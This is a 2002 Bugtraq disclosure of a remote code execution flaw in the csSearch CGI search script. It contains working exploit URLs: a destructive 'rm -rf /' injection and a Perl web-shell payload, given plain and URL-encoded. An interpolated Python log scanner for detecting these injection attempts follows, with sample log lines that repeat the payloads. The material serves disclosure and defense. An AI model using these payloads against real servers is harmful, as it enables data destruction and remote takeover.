From:	 Steve Gustin <stegus1@yahoo.com>
To:	 bugtraq@securityfocus.com
Subject: CGIscript.net - csSearch.cgi - Remote Code Execution (up to 17,000 sites vulnerable)
Date:	 Mon, 25 Mar 2002 14:47:23 -0800 (PST)

CGIscript.net - csSearch.cgi - Remote Code Execution
(up to 17,000 sites vulnerable)
---------------------------------------------------------------------
Name      : csSearch.cgi - Remote Code Execution
Date      : March 25, 2002

Product   : csSearch
Version   : 2.3 (vulnerable)
Vuln Type : Access Validation Error
Severity  : HIGH RISK

Vendor    : WWW.CGIscript.NET, LLC.
Homepage  : http://www.cgiscript.net/


DISCUSSION:
---------------------------------------------------------------------
csSearch is a free perl cgi search script developed by
Mike Barone and Andy Angrick. According to the website
(cgiscript.net) over 17,000 people have downloaded
csSearch.

csSearch stores its configuration data as perl code
in a file called "setup.cgi", which the script
eval()uates to load the settings back into memory at
runtime. Because the command that saves the
configuration performs no access validation, any
remote user can cause attacker-chosen content to be
written to "setup.cgi" and therefore execute arbitrary
perl code on the server.

The paid version of this script, csSearch Pro, may
also be vulnerable.


EXPLOIT:
---------------------------------------------------------------------
Configuration data is saved with the following URL.
Note that any perl code placed in the "setup"
parameter must be URL encoded.

csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE

For example, the classic "rm -rf /" example would be
as follows:

csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

Here's something a little more interesting, less than
300 bytes of code that turns csSearch into a remote
web shell of sorts.

*ShowSearchForm = *Login = sub {
  print "<form method=post action=csSearch.cgi>Enter Command (eg: ls -l)<br>";
  print "<input type=text name=cmd size=99> ";
  print "<input type=submit value=Execute><hr><xmp>";
  $in{'cmd'} && print `$in{'cmd'} 2>&1`;
  exit;
};

URL Encoded as:

csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26print`$in{'cmd'}+2>%261`;exit;};
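For hosts that want to check whether this endpoint has been abused, here is an added example (not part of the advisory and not csSearch code) that scans web server access log lines for csSearch.cgi "savesetup" requests, decodes the "setup" parameter, and flags payloads that look like injected perl rather than settings. The log format, the sample log lines and the "search" command in them are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Common/combined log format request line (constructed sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Signs that a "setup" value is executable perl rather than plain settings: backticks,
# an anonymous sub, a typeglob assignment (*Name = ...) or a dangerous builtin call.
# Legitimate saves are perl code too, so "review" findings still deserve a look.
CODE_RE = re.compile(r"`|\bsub\s*\{|\*\w+\s*=|\b(?:system|exec|open|eval|unlink)\s*\(")

def parse_query(query):
    """Split a query string on '&' only; csSearch payloads contain ';', which some parsers also split on."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params

def savesetup_payload(target):
    """Return the decoded 'setup' parameter if the request writes csSearch configuration, else None."""
    path, _, query = target.partition("?")
    if not path.endswith("csSearch.cgi"):
        return None
    params = parse_query(query)
    if params.get("command") != "savesetup":
        return None
    return params.get("setup", "")

def review_log(lines):
    """Return one finding per savesetup request; verdict is 'code-injection' when the payload looks like perl."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        setup = savesetup_payload(m.group("target"))
        if setup is None:
            continue
        verdict = "code-injection" if CODE_RE.search(setup) else "review"
        findings.append({"ip": m.group("ip"), "time": m.group("ts"), "status": m.group("status"),
                         "verdict": verdict, "setup": setup})
    return findings

# Constructed sample log: one ordinary search, two injection attempts, one plausible settings write.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Mar/2002:14:47:23 -0800] "GET /cgi-bin/csSearch.cgi?command=search&query=perl HTTP/1.0" 200 2048
192.0.2.10 - - [25/Mar/2002:14:48:01 -0800] "GET /cgi-bin/csSearch.cgi?command=savesetup&setup=%60rm%20-rf%20/%60 HTTP/1.0" 200 512
198.51.100.7 - - [25/Mar/2002:15:02:44 -0800] "GET /cgi-bin/csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print%22x%22;exit;}; HTTP/1.0" 200 512
203.0.113.5 - - [25/Mar/2002:15:10:00 -0800] "GET /cgi-bin/csSearch.cgi?command=savesetup&setup=%24Title%3D%27Site+Search%27%3B HTTP/1.0" 200 512
"""

if __name__ == "__main__":
    for f in review_log(SAMPLE_LOG.splitlines()):
        print(f["time"], f["ip"], f["verdict"], repr(f["setup"]))
```

Access logs record only the query string, so a "setup" value sent in a POST body will not appear; treat a clean log as a lower bound, not proof the script was never abused.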


IMPACT:
---------------------------------------------------------------------
Because of the high number of users who have
downloaded this script (over 17,000 according to
cgiscript.net) and the fact that search engines can
easily be used to identify sites with the unique
"csSearch.cgi" script name, the risk posed by this
flaw is very high indeed.  

SOLUTION:
---------------------------------------------------------------------
The vendor has released a new version, csSearch 2.5,
which patches the flaw.

ISPs and Web hosts may want to consider searching for
this script on their servers ("csSearch.cgi") and
disabling it or advising their customers of the risk
until they can install the patched version.

DISCLAIMER:
---------------------------------------------------------------------
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lies within the user's responsibility.


FEEDBACK:
---------------------------------------------------------------------
stegus1@yahoo.com